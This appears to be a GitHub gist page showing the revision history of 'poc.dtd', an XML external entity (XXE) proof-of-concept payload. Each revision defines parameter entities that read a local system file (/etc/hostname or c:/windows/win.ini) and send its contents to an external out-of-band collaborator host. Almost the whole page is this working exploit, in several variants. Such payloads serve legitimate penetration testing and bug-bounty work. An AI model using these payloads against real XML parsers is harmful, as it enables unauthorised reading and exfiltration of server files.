Skip to content

Instantly share code, notes, and snippets.

@thehackerish
Last active September 29, 2022 17:02
Show Gist options
  • Select an option

  • Save thehackerish/7c2bffe563fb88de98c2adc7c9ae6d86 to your computer and use it in GitHub Desktop.

Select an option

Save thehackerish/7c2bffe563fb88de98c2adc7c9ae6d86 to your computer and use it in GitHub Desktop.

Revisions

  1. thehackerish revised this gist Sep 29, 2022. 1 changed file with 1 addition and 4 deletions.
    5 changes: 1 addition & 4 deletions poc.dtd
    Original file line number Diff line number Diff line change
    @@ -1,4 +1 @@
    <!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://fwfn5gywf26g6g92fpg6eoxdg4muaj.oastify.com/?x=%file;'>">
    %eval;
    %exfil;
    <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'http://fwfn5gywf26g6g92fpg6eoxdg4muaj.oastify.com/%data3;'>">
  2. thehackerish revised this gist Sep 29, 2022. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion poc.dtd
    Original file line number Diff line number Diff line change
    @@ -1,4 +1,4 @@
    <!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://bl0ve62kqvqzgakypfjmj2q6rxxnlc.oastify.com/?x=%file;'>">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://fwfn5gywf26g6g92fpg6eoxdg4muaj.oastify.com/?x=%file;'>">
    %eval;
    %exfil;
  3. thehackerish revised this gist Sep 29, 2022. 1 changed file with 2 additions and 2 deletions.
    4 changes: 2 additions & 2 deletions poc.dtd
    Original file line number Diff line number Diff line change
    @@ -1,4 +1,4 @@
    <!ENTITY % file SYSTEM "file:///etc/hostname">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://1bdbl603iww77yf1l7vg5b5cc3i06p.burpcollaborator.net/?x=%file;'>">
    <!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://bl0ve62kqvqzgakypfjmj2q6rxxnlc.oastify.com/?x=%file;'>">
    %eval;
    %exfil;
  4. thehackerish created this gist Jun 9, 2019.
    4 changes: 4 additions & 0 deletions poc.dtd
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,4 @@
    <!ENTITY % file SYSTEM "file:///etc/hostname">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://1bdbl603iww77yf1l7vg5b5cc3i06p.burpcollaborator.net/?x=%file;'>">
    %eval;
    %exfil;